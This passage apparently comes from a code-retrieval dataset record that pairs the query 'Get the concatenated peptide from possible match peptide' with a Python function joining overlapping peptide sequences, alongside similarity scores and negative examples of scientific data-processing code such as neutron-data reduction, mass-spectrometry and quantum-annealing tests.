DeleteWorkspace(Workspace=inst_name+'00000.raw')\n \n \n reducer.energy_bins = rebin\n \n mon_list1=reducer.ei_mon_spectra\n mon_list2=reducer.mon1_norm_spec\n mon_list1.append(mon_list2)\n #mon_list1.sort()\n print 'Monitors for this chunk are: ',mon_list1\n # monitors for merlin[69634,69638]\n \n if inst_name == 'MER':\n #number of spectrums per instrument and where the detectors start (i.e. 5 for mari but 1 for merlin)\n numspec=69632\n spectrum_start=1\n if inst_name == 'MAP':\n #number of spectrums per instrument and where the detectors start (i.e. 
5 for mari but 1 for merlin)\n numspec=41472\n spectrum_start=1\n \n if kwargs.has_key('det_cal_file'):\n cal_file = kwargs.get('det_cal_file') \n else:\n print 'Setting detector calibration to detector block info from ', sample_run\n \n reducer.det_cal_file =None\n reducer.relocate_dets = False\n nums=range(spectrum_start,numspec,nchunk)\n output_wkspName=wksp_out\n for i in nums:\n print '=========================================================================='\n print 'start spectra for this chunk',i\n chunk=range(i,i+nchunk)\n endIndex=nchunk-1\n if i+nchunk > numspec:\n chunk=range(i,numspec+1)\n endIndex=len(chunk)-1\n print 'end spectra for this chunk ', i+endIndex\n \n speclist=mon_list1+chunk\n #print speclist\n LoadRaw(Filename=wb_run,OutputWorkspace=\"wb_wksp\",LoadLogFiles=\"0\",SpectrumList=speclist)\n \n LoadRaw(Filename=sample_run,OutputWorkspace=\"run_wksp\",LoadLogFiles=\"0\",SpectrumList=speclist)\n \n tmp=arb_units(\"wb_wksp\",\"run_wksp\",ei_guess,rebin,'none_for_this_run_type',one2one=True,bleed=False,**kwargs)\n \n \n DeleteWorkspace(Workspace=\"wb_wksp\")\n DeleteWorkspace(Workspace=\"run_wksp\")\n #DeleteWorkspace(\"_wksp.spe\")\n #DeleteWorkspace(\"_wksp.spe-white\")\n \n if i == spectrum_start:\n #crop the workspace to remove the monitors, the workpsace seems sorted on specnumber so this is ok for instruments where the monitors are at the end of the \n # spectrum list\n CropWorkspace(InputWorkspace=tmp,OutputWorkspace=wksp_out,StartWorkSpaceIndex=0,EndWorkSpaceIndex=endIndex)\n else:\n CropWorkspace(InputWorkspace=tmp,OutputWorkspace=tmp,StartWorkSpaceIndex=0,EndWorkSpaceIndex=endIndex)\n ConjoinWorkspaces(InputWorkspace1=wksp_out,InputWorkspace2=tmp,CheckOverlapping='0')\n print int(((float(i+endIndex))/float(numspec))*100),'% complete'\n print '===============================================================================' \n \n GroupDetectors(InputWorkspace=output_wkspName,OutputWorkspace=output_wkspName,MapFile=mapingfile)\n\n \n \n print 'Elapsed time =',time.time()-start_time, 's'\n return mtd[wksp_out]", "def save(self, filename=None):\n\n if not filename:\n filename = self.name+\".lib\"\n\n to_write = []\n\n to_write += \"EESchema-LIBRARY Version 2.3\\n#encoding utf-8\\n\"\n\n to_write += self.output()\n\n to_write += \"#\\n#End Library\\n\"\n\n library_file = open(filename, 'w')\n library_file.writelines(to_write)\n library_file.close()", "def open_template(template_file, path_in):\n\n os.chdir(path_in)\n \n coelution_list = []\n quality_list = []\n experiment_list = []\n\n with open(template_file) as csv_template:\n csv_reader = csv.reader(csv_template, delimiter = \",\")\n line_count = 0\n sum_size = 0\n sum_number_of_spectra = 0\n\n for row in csv_reader:\n if line_count == 0:\n pass\n \n else:\n print(line_count)\n list_of_values_in = row\n\n name = list_of_values_in[0][:-2]\n name_file = name + \".mzML\"\n retention_time_window = list_of_values_in[2]\n retention_time = ip.rt_window_to_delta(retention_time_window)\n quality = list_of_values_in[4]\n mz_precursor = float(list_of_values_in[5])\n delta_mz = 1.3\n mz_in_template = list(filter(lambda x: x != \"\", list_of_values_in[9:]))\n\n ms2_spectra_found = cp.find_spectra_by_mz_and_rt(name_file, mz_precursor, retention_time[0], delta_mz, retention_time[1])\n print(\"Number of MS2 spectra found:\", len(ms2_spectra_found))\n\n precursor_list_ms2 = list()\n for spectrum in ms2_spectra_found:\n for mz in spectrum.get_precursor_mz():\n precursor_list_ms2.append(mz)\n\n print(\"Precursor list:\", 
precursor_list_ms2)\n precursor_ms2 = statistics.mode(precursor_list_ms2)\n print(\"Precursor found:\", precursor_ms2)\n\n spectra_found = cp.find_spectra_by_mz_and_rt(name_file, mz_precursor, retention_time[0], delta_mz, retention_time[1], ms_level_1 = True)\n print(\"Number of MS1 spectra found:\", len(spectra_found))\n print(\"sizes:\")\n for spectrum in spectra_found:\n print(spectrum.get_size())\n \n average_spectrum = cp.average_spectra_ordered(spectra_found, 0.03)\n\n # We sort the spectrum by mz\n\n coelution = is_coelution(average_spectrum, precursor_ms2)\n \n coelution_list.append(coelution)\n quality_list.append(quality)\n experiment_list.append(name)\n \n line_count += 1\n \n for i in range(0, len(coelution_list)):\n print(\"Experiment name:\", experiment_list[i])\n print(\"Quality:\", quality_list[i])\n print(\"Coelution:\", coelution_list[i])\n print()", "def sum_simulated_test():\n f = open(\"./results/simulated_sigmoid_sum.csv\", \"w\")\n #f1 = open(\"./results/avg_pres.txt\", \"w\")\n #f.write(\"num. of qubits; precision\\n\")\n\n\n computable_qubits = 27\n num_subtest = 1000\n\n acum_precision = 0\n coeffs = []\n temp = -10\n while temp < 11:\n coeffs.append(temp)\n temp += 0.25\n #for coeff in coeffs:\n # variables.c_summation = coeff\n # print(coeff)\n for i in range(2, computable_qubits):\n #print(\"qubit: \", i)\n precision = 0\n x = []\n for j in range(num_subtest):\n\n random_dict = get_random_dict(i)\n\n # compute real answer\n real_answer = 0\n for value in random_dict.values():\n real_answer += value\n # f1.write(str(real_answer)+\";\")\n x.append(real_answer)\n\n # assign spin value to real_answer\n if real_answer < 0:\n real_answer = -1\n elif real_answer > 0:\n real_answer = 1\n else:\n real_answer = 0\n bqm = get_bqm()\n quantum_sigmoid_sum(bqm, random_dict, \"target\")\n sampler = get_simulated_sampler()\n result = sampler.sample(bqm)\n if real_answer == 0:\n precision += 1\n # f1.write(\"1\\n\")\n elif real_answer == result.first.sample['target']:\n precision += 1\n # f1.write(\"1\\n\")\n# else:\n # f1.write(\"0\\n\")\n\n precision /= num_subtest\n # acum_precision+= precision\n\n f.write(str(i) + \";\" + str(precision) + \"\\n\")\n f.close()\n #f1.write(str(coeff)+\";\"+ str(round(acum_precision/(computable_qubits-1), 4)) + \"\\n\")\n # acum_precision = 0\n #f1.close()", "def main(inp_f, out_f):\n\n output = open(out_f, \"w\")\n\n with open(inp_f) as f:\n\n print(\"Processing and creating plots. This may take a while depending \"\n \"on the number of lines of input.\")\n\n # Piece together new header.\n header = f.readline().strip().split(\"\\t\")\n new_header_samps = \"\\t\".join([x.split(\"_\")[0] + \"_SDs_AROUND_MEAN\" for x in header[\n 5:]]) + \"\\t\" + \"\\t\". 
join([x.split(\"_\")[0] + \"_MADs_AROUND_MEDIAN\" for x in header[5:]])\n new_header = \"\\t\".join(header) + \"\\t\" + \"MEAN\" + \"\\t\" + \"SD\" + \\\n \"\\t\" + \"MEDIAN\" + \"\\t\" + \"MAD\" + \"\\t\" + new_header_samps\n print(new_header, file=output)\n\n for line in f:\n line = line.strip().split(\"\\t\")\n se_id = \"SE \" + str(line[3])\n # Assumes actual data starts in 6th column.\n data = [float(x) for x in line[5:]]\n se_samples = line[4].split(\";\")\n\n # Mean and std_dev of signal for that line.\n p_mean, p_stdev = calc_mean_stdev(data)\n p_median, p_mad = calc_median_mad(data)\n\n # Get MADs from mean for each sample.\n if p_mad == 0:\n mad_diffs = [\"NA\" for x in data]\n out_mad_diffs = \"\\t\".join(mad_diffs)\n else:\n mad_diffs = [((x - p_median) / p_mad) for x in data]\n out_mad_diffs = \"\\t\".join(\n [\"{0:.4f}\".format(float(x)) for x in mad_diffs])\n\n # Make plot.\n x_label = \"MADs around Mean\"\n prefix = \"MAD\"\n make_distplot(mad_diffs, out_f, se_id, x_label, prefix)\n\n # Get SDs from mean for each sample.\n if p_stdev == 0:\n sd_diffs = [\"NA\" for x in data]\n out_sd_diffs = \"\\t\".join(sd_diffs)\n else:\n sd_diffs = [((x - p_mean) / p_stdev) for x in data]\n out_sd_diffs = \"\\t\".join(\n [\"{0:.4f}\".format(float(x)) for x in sd_diffs])\n\n # Make plot.\n x_label = \"SDs around Mean\"\n prefix = \"SD\"\n make_distplot(sd_diffs, out_f, se_id, x_label, prefix)\n\n new_line = (\"\\t\".join(line) + \"\\t\" + \"{0:.4f}\".format(\n float(p_mean)) + \"\\t\" + \"{0:.4f}\".format(float(p_stdev)) +\n \"\\t\" + \"{0:.4f}\".format(float(p_median)) + \"\\t\" +\n \"{0:.4f}\".format(float(p_mad)) + \"\\t\" + out_sd_diffs +\n \"\\t\" + out_mad_diffs)\n\n print(new_line, file=output)\n\n output.close()" ]
[ "0.54608756", "0.5400242", "0.5211215", "0.5197263", "0.5194946", "0.51773113", "0.51361793", "0.51357317", "0.5126693", "0.5125787", "0.5115333", "0.51034206", "0.5085765", "0.50600755", "0.5036529", "0.5036529", "0.5028773", "0.50280166", "0.5021801", "0.50140125", "0.5008585", "0.4992779", "0.49831247", "0.4980833", "0.49437845", "0.49324223", "0.4924867", "0.49179706", "0.49059483", "0.49037325", "0.48906454", "0.4886999", "0.48818204", "0.48774618", "0.4873023", "0.4868931", "0.4867491", "0.4866731", "0.48645657", "0.4859617", "0.48487145", "0.48370066", "0.4834187", "0.48323077", "0.48256272", "0.48196673", "0.48128495", "0.48080227", "0.47842348", "0.47822896", "0.47820675", "0.477544", "0.4766118", "0.47642002", "0.4757987", "0.47573507", "0.47493166", "0.47418302", "0.47392398", "0.47310078", "0.47306147", "0.47173715", "0.4710617", "0.4695366", "0.4686759", "0.46818596", "0.46608755", "0.46501836", "0.46470445", "0.4644188", "0.4639106", "0.46343076", "0.46265355", "0.46262354", "0.4626006", "0.46248436", "0.46138352", "0.4609842", "0.46072602", "0.46065107", "0.46021485", "0.45993403", "0.4598147", "0.4597577", "0.45954952", "0.4590095", "0.45884407", "0.45860797", "0.45851234", "0.45818153", "0.45817935", "0.458009", "0.45758808", "0.45754322", "0.45749953", "0.4574026", "0.45731035", "0.45730135", "0.45672247", "0.4557956" ]
0.6827684
0
Get the concatenated peptide from possible match peptide.
def get_concat_peptide(front_coord_pair, back_coord_pair, front_peptide, back_peptide, strand, k=None):
    def get_longest_match_position(front_str,back_str,L=None):
        if L is None:
            L = min(len(front_str),len(back_str))
        for i in reversed(list(range(1,L+1))):
            if front_str[-i:] == back_str[:i]:
                return i
        return None
    if strand == '+':
        front_coord = front_coord_pair.stop_v2
        back_coord = back_coord_pair.start_v1
    else:
        front_coord = front_coord_pair.start_v2
        back_coord = back_coord_pair.stop_v1
    if abs(front_coord-back_coord) % 3 == 0:
        if front_coord == back_coord:
            # no intersection and we concatenate them directly
            new_peptide = front_peptide + back_peptide
        else:
            pep_common_num = get_longest_match_position(front_peptide,back_peptide,L=k)
            if pep_common_num is None:
                new_peptide = ''
            else:
                new_peptide = front_peptide + back_peptide[pep_common_num:]
        return new_peptide
    else:
        return ''
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def concatenate(self):\n if not self.match_count:\n # No concatenating if there are no matches\n return []\n if self.match_count <= 1:\n # Can't combine a single match\n return self.match_list\n # Setup for iterating through\n cont = True\n first = self.match_list[self.i]\n second = self.match_list[self.j]\n while cont and self.match_count > 2:\n first, second, cont = self._process_main()\n\n # Last block is a special case\n self._process_last(first, second)\n return self.combined", "def return_peptide (RNA):\n\t# Should work with already made sequence without stop codons. Only one peptide per call\n\n\tdna.isNucleotide(RNA)\n\tif 'T' in RNA: raise dna.InvalidSequenceError\t\n\tpeptide = \"\"\n\tid = 0\n\twhile id < len(RNA):\n\t\ttRNA = RNA[id:id+3]\n\t\tif not tRNA in RNA_code: break\n\t\tAA = RNA_code[tRNA]\n\t\tif AA == False: # In the case if was mistake in the previous step\n\t\t\tbreak\n\t\tpeptide += AA\n\t\tid += 3\t\n\treturn peptide", "def possible_subpeptides(self):\n ret = [\"\"]\n protein_len = len(self.protein)\n for l in range(1, protein_len):\n for i in range(protein_len):\n if i + l <= protein_len:\n ret += [self.protein[i : i+l]]\n else:\n ret += [self.protein[i:] + self.protein[:(i+l)%protein_len]]\n ret += [self.protein]\n return ret", "def get_match_str(self, match):\n return \"\"", "def join(self) -> List[Dict[str, Any]]:\n return self.matched + self.unmatched", "def protein_from_orfs(dna):\n rna = dna.replace(\"T\", \"U\")\n reverse_complement_rna = complement_strand(dna).replace(\"T\", \"U\")\n\n candidate_proteins = set()\n\n for strand in [rna, reverse_complement_rna]:\n for index in [m.start() for m in re.finditer('AUG', strand)]:\n codons_list = codons(strand[index:])\n protein = \"\"\n\n if any(rna_codon_dict[codon] == \"Stop\" for codon in codons_list):\n for codon in codons_list:\n symbol = rna_codon_dict[codon]\n\n if symbol != \"Stop\":\n protein += symbol\n else:\n candidate_proteins.add(protein)\n break\n\n return candidate_proteins", "def primary(self):\n return Seq(''.join([r.aa for r in self.residues]), protein_alphabet)", "def getCodonSeqs(self):\r\n combinations = list(self.codonTable[aa] for aa in self.peptide) # creates a list of possible codons based on AA\r\n self.allPepSeqs = list(''.join(codon) for codon in itertools.product(*combinations)) # creates list of peptides\r\n return", "def _get_prep_with_word(token: spacy.tokens.Token) -> (str, spacy.tokens.Token):\n if token is None:\n return \"\", None\n\n prep = None\n # search of prepositions\n for child in token.rights:\n if child.dep_ == \"prep\":\n prep = child\n break\n if prep is None:\n return \"\", None\n\n for word in prep.children:\n # if preposition has child of type 'object of preposition' or 'complement of a preposition'\n # then add it to the result\n if word.dep_ in [\"pobj\", \"pcomp\"]:\n chunk_str = SpacyEventExtractor._get_chunk(word)\n return str(prep) + \" \" + chunk_str, word\n\n return \"\", None", "def challenge2(self):\n # Remove one letter at each position from each ID and plonk them in a set\n match_possibilities = set()\n for id in self.lines:\n sub_ids = set()\n for letter_pos in range(len(id)):\n sub_ids.add(id[:letter_pos] + id[(letter_pos + 1):])\n \n matching_letters = match_possibilities.intersection(sub_ids)\n if matching_letters:\n break\n\n match_possibilities.update(sub_ids)\n\n # If the current one matches\n print(f\"Matching letters: {matching_letters.pop()}\")", "def makePeptideOutputLine(self, protein, peptide):\n outputList = 
self.makePeptideOutputList(protein, peptide)\n outputString = \"%s\\n\" % '\\t'.join(str(x) for x in outputList)\n return outputString", "def elementCom(Paire1,Paire2) :\n elem_com=\" \"\n elementPaire1=\" \"\n elementPaire2=\" \"\n p1 = Paire1[1]\n p2 = Paire2[1]\n if p1 != p2 :\n for i in range (2):\n for j in range (2):\n if p1[i] == p2[j]:\n elem_com = p1[i] \n elementPaire1 = p1[1-i] \n elementPaire2 = p2[1-j] \n return elem_com, elementPaire1, elementPaire2", "def get_true_propositions(self):\n current_loc = self.objects.get((self.agent.i,self.agent.j), \"\")\n if current_loc: # taxi at location\n loc_i = \"abcd\".index(current_loc.lower())\n if self.passenger == current_loc: # passenger at location\n return Traces.letters[loc_i+4]\n else: # passenger in taxi or elsewere\n return Traces.letters[loc_i]\n else: # taxi in transit\n return \"\"\n\n # ret = self.objects.get((self.agent.i,self.agent.j), \"\").lower()\n # ret += \"efgh\"[\"abcd\".index(self.destination.lower())]\n # if self.passenger is not None: # at location\n # ret += \"ijkl\"[\"abcd\".index(self.passenger.lower())]\n # else: # in taxi\n # ret += \"m\"\n # return ret", "def _bpe(self, token):\n if token in self._cache:\n return self._cache[token]\n\n if self._suffix:\n word = tuple(token[:-1]) + (token[-1] + self._suffix,)\n else:\n word = tuple(token)\n\n pairs = get_pairs(word)\n\n if not pairs:\n if self._suffix:\n return token + self._suffix\n else:\n return token\n\n while True:\n bigram = min(pairs, key=lambda pair: self._bpe_ranks.get(pair, float(\"inf\")))\n if bigram not in self._bpe_ranks:\n break\n first, second = bigram\n new_word = []\n i = 0\n while i < len(word):\n try:\n j = word.index(first, i)\n except ValueError:\n new_word.extend(word[i:])\n break\n else:\n new_word.extend(word[i:j])\n i = j\n\n if word[i] == first and i < len(word) - 1 and word[i + 1] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n new_word = tuple(new_word)\n word = new_word\n if len(word) == 1:\n break\n else:\n pairs = get_pairs(word)\n word = \" \".join(word)\n self._cache[token] = word\n return word", "def cc_matcher_fragment (cls) :\n sk = lambda cc : (- len (cc), cc)\n ccs = sorted (cls.cc_map, key = sk)\n result = \"\".join ((\"(?P<cc>\", \"|\".join (ccs), \")\"))\n return result", "def get_next_protein(self):\n return self.proteins.pop()", "def get_protein_fasta(uniprot_id):\r\n url = \"http://www.uniprot.org/uniprot/{}.fasta\".format(uniprot_id)\r\n string = re.split(\"\\n\",ur.urlopen(url).read().decode(),1)[1]\r\n return re.sub(\"\\n\",\"\",string)", "def part2(data: str = None) -> str:\n idlist: List[IDProfiler] = getidlist(data)\n for i in range(len(idlist)):\n for j in range(i + 1, len(idlist)):\n shared: str = idlist[i].sharedletters(idlist[j])\n if len(shared) is len(idlist[i].rawstr) - 1:\n return shared", "def combine_permutations(p1, p2):\n p = tuple(map(p2.__getitem__, p1))\n return p", "def dummy_junction14():\n return \"junction:chr1:176-324:+\"", "def find_let(ph_number, numb_counter):\n numb_i = int(ph_number[numb_counter])\n new_str = LETTER_ARRAY[numb_i]\n if numb_counter+1 != len(ph_number):\n res_s = map(''.join, itertools.product(new_str, find_let(ph_number, numb_counter+1)))\n else:\n return new_str\n return res_s", "def combine(self, token):\n if token==None:\n return None\n retval = ''\n for tok in token:\n if isinstance(tok, list):\n retval+=self.combine(tok)\n else:\n retval+=tok\n return retval", "def generate_full_chain(chain):\n 
list_of_subchains = [extract_amino_acids(subchain) for subchain in chain]\n # Join list into single string separated by spaces\n return ' '.join(list_of_subchains)", "def bpe(self, word: List[str]) -> List[str]:\n pairs = self.get_pairs(word)\n\n if len(pairs) == 0:\n return word\n\n while True:\n min_rank = self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf'))\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n\n if word[i] == first and i < len(word) - 1 and word[i + 1] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word", "def join_team(team: List[TeambuilderPokemon]) -> str:\n return \"]\".join([mon.formatted for mon in team])", "def disambiguate(self, word):\n matches = re.match(r'^pen([cdjz])(.*)$', word)\n if matches:\n return matches.group(1) + matches.group(2)", "def dummy_junction13():\n return 'junction:chr1:176-299:+'", "def get_candidates(self):\n return u', '.join([c.identifier for c in self.candidates.all()])", "def printEncodePep(self):\r\n for i in range(len(self.seq)):\r\n if self.seq[i:i+(len(self.peptide*3))] in self.allPepSeqs:\r\n print(self.seq[i:i+(len(self.peptide*3))]) # print peptide if DNA region matches a possible peptide\r\n return", "def dummy_junction24():\n return 'junction:chr1:251-399:+'", "def dummy_junction12():\n return \"junction:chr1:176-224:+\"", "def sequence_from_thresh(match):\n if len(match) == 0:\n print(\"Couldn't find any audio in input clip\")\n exit(0)\n\n sequences = []\n cur_seq = [match[0]]\n cur_id = 1\n\n while cur_id < len(match):\n if match[cur_id] == match[cur_id - 1] + 1:\n cur_seq.append(match[cur_id])\n if cur_id == len(match) - 1:\n sequences.append(cur_seq)\n break\n else:\n sequences.append(cur_seq)\n cur_seq = [match[cur_id]]\n\n cur_id += 1\n if len(sequences) == 0:\n return [(match[0], match[0])]\n\n sequences = [(x[0], x[-1]) for x in sequences]\n\n return sequences", "def get_complement(nucleotide):\n if nucleotide == 'A':\n return 'T'\n elif nucleotide == 'C':\n return 'G'\n elif nucleotide == 'G':\n return 'C'\n elif nucleotide == 'T':\n return 'A'\n else:\n return None", "def translation (RNA):\n\tresult = []\n\tif len(RNA) == 0: return result\n\tdna.isNucleotide(RNA)\n\tif \"T\" in RNA: raise dna.InvalidSequenceError\n\n\torf = dna.get_orf(RNA)\n\n\tfor frame in orf:\n\t\tpeptide = return_peptide(RNA[frame[0]:frame[1]])\n\t\tresult.append(peptide)\n\treturn result", "def obtain_protein_names(dyn_id):\n model=DyndbModel.objects.select_related(\"id_protein\",\"id_complex_molecule\").get(dyndbdynamics__id=dyn_id)\n prot_li_names=[]\n if model.id_protein:\n gprot= model.id_protein.receptor_id_protein\n if gprot:#it means it is a GPCR\n prot_li_names.append(model.id_protein.name)\n else:\n dprot_li_all=DyndbProtein.objects.select_related(\"receptor_id_protein\").filter(dyndbcomplexprotein__id_complex_exp__dyndbcomplexmolecule=model.id_complex_molecule.id)\n for dprot in dprot_li_all:\n gprot= dprot.receptor_id_protein\n if 
gprot:#it means it is a GPCR\n prot_li_names.append(dprot.name)\n return \",\".join(prot_li_names)", "def get_longest_peptide(rna_sequence, genetic_code):\n #Create an empty list to store longest_peptide:\n pp_all=[]\n #use get_all_translation to get all 3 possible AA seq.\n polypeptide_list = get_all_translations(rna_sequence, genetic_code)\n #Create reverse complement sequence using reverse_and_complement function\n rev_c_seq = reverse_and_complement(rna_sequence)\n #use get_all_translation to get all 3 possible reverse_complement AA seq.\n polypeptide_list_rev_c=get_all_translations(rev_c_seq, genetic_code)\n #Concatenate all possible 6 AA sequences and store in pp_all list:\n pp_all=polypeptide_list+polypeptide_list_rev_c\n #Find the longest peptide, if RNA seq. is empty, return empty seq.\n if pp_all==[]:\n return \"\"\n else:\n return max(pp_all, key=len)", "def dummy_junction23():\n return 'junction:chr1:251-299:+'", "def action(self):\n\n base_seq = super().get_base_seq(self.__arguments, self.__dna_data, \"#@\")\n str_base_seq = base_seq.get_dna_string()\n seq_to_find = super().get_seq_to_be_found(self.__arguments, self.__dna_data)\n return str(str_base_seq.find(seq_to_find))", "def concat_pattern():\n pattern = is_tuple(None)\n pattern = is_op(\"concatenate\")(pattern)\n\n return pattern", "def get_complement(nucleotide):\n if nucleotide == 'A':\n return 'T'\n elif nucleotide == 'T':\n return 'A'\n elif nucleotide == 'C':\n return 'G'\n elif nucleotide == 'G':\n return 'C'", "def tournament():\n return min(sample(population, sample_size)).chromosome[:]", "def get_complement(nucleotide):\n\n if nucleotide == 'T':\n return 'A'\n elif nucleotide == 'A':\n return 'T'\n elif nucleotide == 'C':\n return 'G'\n elif nucleotide == 'G':\n return 'C'", "def sharedletters(self, idprofiler: \"IDProfiler\") -> str:\n shared: str = \"\"\n for i in range(len(self.rawstr)):\n if self.rawstr[i] is idprofiler.rawstr[i]:\n shared += self.rawstr[i]\n return shared", "def get_complement(nucleotide):\n if nucleotide=='A':\n \treturn 'T'\n if nucleotide=='C':\n \treturn 'G'\n if nucleotide=='T':\n \treturn 'A'\n if nucleotide=='G':\n \treturn 'C'", "def get_protein_inserted_sequence(self, parts: List,\n used_one_letter: bool) -> Optional[str]:\n # Check inserted sequences\n inserted_sequence = \"\"\n if used_one_letter:\n for i in range(len(parts[1])):\n aa = parts[1][i:i + 1]\n if len(aa) != 1:\n return None\n try:\n aa3_to_aa1_lut[aa1_to_aa3(aa.upper())]\n except KeyError:\n return None\n else:\n inserted_sequence += aa.upper()\n else:\n for i in range(0, len(parts[1]), 3):\n aa = parts[1][i:i + 3]\n if len(aa) != 3 or aa.capitalize() not in aa3_to_aa1_lut:\n if aa != \"ter\":\n return None\n\n try:\n inserted_sequence += aa3_to_aa1(aa.capitalize())\n except KeyError:\n return None\n\n return inserted_sequence if inserted_sequence else None", "def translate_framed_strand(framed_strand):\n\n polypeptide = []\n # Iterate through all the codons in our strand and look up their resultant amino acid\n logging.info(\"Translating strand: \" + str(framed_strand))\n for codon in framed_strand:\n if len(codon) != 3:\n break\n if codon in stop_codons:\n # We are at the end of the sequence, so cut.\n logging.debug(\"Stopping at codon \" + codon)\n break\n logging.debug(\"Adding polypeptide \" + codons_to_amino_acids[codon][2])\n polypeptide.append(codons_to_amino_acids[codon])\n return polypeptide", "def output(self):\n\t\treturn \"\".join(self.pieces)", "def recieve_proposals(self, joint=False):\n\n props = 
[p.strategy for p in self.participants]\n if not joint:\n return props\n return pd.concat(props).reset_index(drop=True)", "def getMergeLine(desc_line,CC3_sample,GP2_sample):\n return desc_line.strip(\"\\n\") + \"\" + CC3_sample + \"\" + GP2_sample + \"\\n\"", "def get_complement(nucleotide):\n #if statements change nucleotide inputs to their complementary nucleotide\n if nucleotide == \"A\":\n return \"T\"\n if nucleotide == \"T\":\n return \"A\" \n if nucleotide == \"C\":\n return \"G\"\n if nucleotide == \"G\":\n return \"C\"", "def gardRecomb(data, pvalue, dAT, hostFile):\n\t#try:\n\tlogger=logging.getLogger(\"main.recombination\")\n\tsetattr(data, \"lGard\", [])\n\tnb = 1\n\tdFrag = {}\n\tfor aln in dAT:\n\t logger.info(\"Running GARD on {:s}\".format(aln))\n\t gardRes = runGARD(aln, \n\t\t\t data.o, \n\t\t\t hostFile, \n\t\t\t data.logger)\n\t\t\t\n\t logger.info(\"Checked for recombination using HYPHY GARD.\")\n\t\t\t\t\n \n\t parsedFragments = parseGard(gardRes,\n aln,\n data.o, \n\t\t\t\t logger)\n\n\t logger.info(\"Parsed GARD results.\")\n\t if len(parsedFragments) > 0:\n\t for frag in parsedFragments:\n\t logger.info(\"Running Phyml on fragment: {:s}\".format(frag))\n\t fragTree = runPhyML(frag, \"\", data.o)\n\t dFrag[frag] = fragTree+\"_phyml_tree.txt\"\n\t else:\n\t logger.info(\"No fragments of recombination identified.\")\n\t \n\t dAT.update(dFrag)\n\t return(dAT)\n\t\n\t\"\"\"except Exception:\n\tlogger.info(\"GARD encountered an unexpected error, skipping.\")\n\treturn dAT\"\"\"", "def get_complement(nucleotide): # This one works\n nuc = list(nucleotide)\n count = 0\n complement = ''\n for element in nuc:\n if element == 'A':\n nuc[count] = 'T'\n elif element == 'T':\n nuc[count] = 'A'\n elif element == 'C':\n nuc[count] = 'G'\n elif element == 'G':\n nuc[count] = 'C'\n complement = complement + nuc[count]\n count = count + 1\n return complement", "def get_equipment(self):\n s = ''\n for i in range(12, 16):\n s += ' ' + str(self.dna[i])\n return s", "def getMatchup(self, name):\n if self.atHome:\n return (name, self.opponent)\n else:\n return (self.opponent, name)", "def get_sequence(self, part: str) -> Optional[str]:\n for char in part:\n if char.upper() not in self.base_nucleotides:\n return None\n return part.upper()", "def proteinTranslation(seq, geneticCode = STANDARD_GENETIC_CODE):\n\n seq = seq.replace('T','U') # Make sure we have RNA sequence\n proteinSeq = []\n \n i = 0\n while i+2 < len(seq):\n \n codon = seq[i:i+3]\n aminoAcid = geneticCode[codon]\n \n if aminoAcid is None: # Found stop codon\n break\n\n proteinSeq.append(aminoAcid)\n i += 3\n\n return proteinSeq", "def getResultPString(self):\n # TODO: WARNING!!! Make sure the resultPstring is emptied if we do some modification to the lsystem!! 
OR THIS WILL BEHAVE INCORRECTLY!\n if self.resultPString == None: self.resultPString = self.iterate()\n return self.resultPString", "def query_align_string(ref, cigar_int_pairs):\n out_ref = []\n ref_index = 0\n\n for b, cnt in cigar_int_pairs:\n sym = cigar_int_to_c(b) if isinstance(b, int) else b\n if sym in CIGAR_MATCH_MISSMATCH or sym in CIGAR_INSERTION:\n assert ref_index + cnt <= len(ref)\n out_ref.extend(ref[ref_index:ref_index + cnt])\n ref_index += cnt\n\n elif sym in CIGAR_DELETION:\n out_ref.extend(['-'] * cnt)\n return ''.join(out_ref)", "def dummy_junction34():\n return 'junction:chr1:351-399:+'", "def output(self):\n return \" \".join(self.pieces)", "def concatenate(sequence):\n\n return Profiles([x.data for y in sequence for x in y],\n [x.description for y in sequence for x in y])", "def format_hgvs_mutation(mutation_refseq_aa):\n if pd.isnull(mutation_refseq_aa):\n return (np.nan, np.nan, np.nan)\n refseq_base_id = mutation_refseq_aa.split(':')[0].split('.')[0]\n refseq_mutation = mutation_refseq_aa.split(':')[-1].lstrip('p.')\n refseq_mutation_pos = int(refseq_mutation[1:-1])\n return refseq_base_id, refseq_mutation, refseq_mutation_pos", "def cand_str(self):\n return \"\".join([str(x) for x in self.cands])", "def superstring(g):\n substrings = []\n last_overlap = 0\n i = source(g)\n while True:\n substrings.append(g.vertex_label(i)[last_overlap:])\n if g.outdegree(i) > 0:\n j = g.out_edges(i)[0][1]\n last_overlap = g.edge_weight(i, j)\n i = j\n else:\n break\n return \"\".join(substrings)", "def split_match(self, match):\n match, line, col, error, warning, message, near = super().split_match(match)\n if match:\n message = '[vcom] ' + message\n return match, line, col, error, warning, message, near", "def merge_by_intersection(self, p, C):\n \n if '' in C:\n # At least one of two without clusure\n if '?' 
